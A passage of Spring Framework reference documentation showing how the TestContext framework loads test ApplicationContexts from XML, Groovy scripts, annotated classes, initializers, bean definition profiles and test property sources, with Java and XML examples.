with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. 
Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. Resource lookup semantics for\nGroovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML\nconfiguration files>>.\n\n\n.Enabling Groovy script support\n[TIP]\n====\nSupport for using Groovy scripts to load an `ApplicationContext` in the Spring\nTestContext Framework is enabled automatically if Groovy is on the classpath.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/AppConfig.groovy\" and\n\t\/\/ \"\/TestConfig.groovy\" in the root of the classpath\n\t**@ContextConfiguration({\"\/AppConfig.groovy\", \"\/TestConfig.groovy\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default Groovy script.\nSpecifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`\ndetect a default location based on the name of the test class. If your class is named\n`com.example.MyTest`, the Groovy context loader will load your application context from\n`\"classpath:com\/example\/MyTestContext.groovy\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTestContext.groovy\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Declaring XML config and Groovy scripts simultaneously\n[TIP]\n====\nBoth XML configuration files and Groovy scripts can be declared simultaneously via the\n`locations` or `value` attribute of `@ContextConfiguration`. 
If the path to a configured\nresource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;\notherwise it will be loaded using a `GroovyBeanDefinitionReader`.\n\nThe following listing demonstrates how to combine both in an integration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"\/app-config.xml\" and \"\/TestConfig.groovy\"\n\t@ContextConfiguration({ \"\/app-config.xml\", \"\/TestConfig.groovy\" })\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n====\n\n[[testcontext-ctx-management-javaconfig]]\n===== Context configuration with annotated classes\n\nTo load an `ApplicationContext` for your tests using __annotated classes__ (see\n<<beans-java>>), annotate your test class with `@ContextConfiguration` and configure the\n`classes` attribute with an array that contains references to annotated classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from AppConfig and TestConfig\n\t**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Annotated Classes\n[TIP]\n====\nThe term __annotated class__ can refer to any of the following.\n\n* A class annotated with `@Configuration`\n* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)\n* A JSR-330 compliant class that is annotated with `javax.inject` annotations\n* Any other class that contains `@Bean`-methods\n\nConsult the javadocs of `@Configuration` and `@Bean` for further information regarding\nthe configuration and semantics of __annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. 
In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. 
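For example, the following sketch uses a `@Configuration` class as the entry point and\npulls in an existing XML file via `@ImportResource` (the class and resource names here\nare purely illustrative):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t\/\/ imports bean definitions from the existing XML configuration\n\t**@ImportResource**(\"classpath:\/app-config.xml\")\n\tpublic class MixedConfig {\n\t\t\/\/ additional @Bean methods for test-specific components...\n\t}\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = MixedConfig.class)\n\tpublic class MixedConfigTests {\n\t\t\/\/ class body...\n\t}\n----\n\n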
Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. 
Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. 
This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. 
Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. 
The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. 
For further information, refer to the\ncorresponding javadocs.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden programmatically via a custom resolver\n\t@ActiveProfiles(\n\t\tresolver = OperatingSystemActiveProfilesResolver.class,\n\t\tinheritProfiles = false)\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service.test;\n\n\tpublic class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {\n\n\t\t@Override\n\t\tpublic String[] resolve(Class<?> testClass) {\n\t\t\tString profile = ...;\n\t\t\t\/\/ determine the value of profile based on the operating system\n\t\t\treturn new String[] {profile};\n\t\t}\n\t}\n----\n\n[[testcontext-ctx-management-property-sources]]\n===== Context configuration with test property sources\n\nSpring 3.1 introduced first-class support in the framework for the notion of an\nenvironment with a hierarchy of _property sources_, and since Spring 4.1 integration\ntests can be configured with test-specific property sources. In contrast to the\n`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`\nannotation can be declared on a test class to declare resource locations for test\nproperties files or _inlined_ properties. These test property sources will be added to\nthe set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded\nfor the annotated integration test.\n\n[NOTE]\n====\n`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`\nSPI, but `@TestPropertySource` is not supported with implementations of the older\n`ContextLoader` SPI.\n\nImplementations of `SmartContextLoader` gain access to merged test property source values\nvia the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in\n`MergedContextConfiguration`.\n====\n\n*Declaring test property sources*\n\nTest properties files can be configured via the `locations` or `value` attribute of\n`@TestPropertySource` as shown in the following example.\n\nBoth traditional and XML-based properties file formats are supported -- for example,\n`\"classpath:\/com\/example\/test.properties\"` or `\"file:\/\/\/path\/to\/file.xml\"`.\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"test.properties\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/test.xml\"`. A path which\nreferences a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will\nbe loaded using the specified resource protocol. Resource location wildcards (e.g.\n`**\/*.properties`) are not permitted: each location must evaluate to exactly one\n`.properties` or `.xml` resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n_Inlined_ properties in the form of key-value pairs can be configured via the\n`properties` attribute of `@TestPropertySource` as shown in the following example. 
All\nkey-value pairs will be added to the enclosing `Environment` as a single test\n`PropertySource` with the highest precedence.\n\nThe supported syntax for key-value pairs is the same as the syntax defined for entries in\na Java properties file:\n\n* `\"key=value\"`\n* `\"key:value\"`\n* `\"key value\"`\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(properties = {\"timezone = GMT\", \"port: 4242\"})\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Default properties file detection*\n\nIf `@TestPropertySource` is declared as an empty annotation (i.e., without explicit\nvalues for the `locations` or `properties` attributes), an attempt will be made to detect\na _default_ properties file relative to the class that declared the annotation. For\nexample, if the annotated test class is `com.example.MyTest`, the corresponding default\nproperties file is `\"classpath:com\/example\/MyTest.properties\"`. If the default cannot be\ndetected, an `IllegalStateException` will be thrown.\n\n*Precedence*\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nIn the following example, the `timezone` and `port` properties as well as any properties\ndefined in `\"\/test.properties\"` will override any properties of the same name that are\ndefined in system and application property sources. Furthermore, if the\n`\"\/test.properties\"` file defines entries for the `timezone` and `port` properties those\nwill be overridden by the _inlined_ properties declared via the `properties` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\n\t\tlocations = \"\/test.properties\",\n\t\tproperties = {\"timezone = GMT\", \"port: 4242\"}\n\t)\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Inheriting and overriding test property sources*\n\n`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`\nattributes that denote whether resource locations for properties files and inlined\nproperties declared by superclasses should be __inherited__. The default value for both\nflags is `true`. This means that a test class inherits the locations and inlined\nproperties declared by any superclasses. Specifically, the locations and inlined\nproperties for a test class are appended to the locations and inlined properties declared\nby superclasses. Thus, subclasses have the option of __extending__ the locations and\ninlined properties. Note that properties that appear later will __shadow__ (i.e.,\noverride) properties of the same name that appear earlier. 
In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class __shadow__\nand effectively replace the configuration defined by superclasses.\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using\nonly the `\"base.properties\"` file as a test property source. In contrast, the\n`ApplicationContext` for `ExtendedTest` will be loaded using the `\"base.properties\"`\n**and** `\"extended.properties\"` files as test property source locations.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(\"base.properties\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(\"extended.properties\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ ...\n\t}\n----\n\nIn the following example, the `ApplicationContext` for `BaseTest` will be loaded using only\nthe _inlined_ `key1` property. In contrast, the `ApplicationContext` for `ExtendedTest` will be\nloaded using the _inlined_ `key1` and `key2` properties.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@TestPropertySource(properties = \"key1 = value1\")\n\t@ContextConfiguration\n\tpublic class BaseTest {\n\t\t\/\/ ...\n\t}\n\n\t@TestPropertySource(properties = \"key2 = value2\")\n\t@ContextConfiguration\n\tpublic class ExtendedTest extends BaseTest 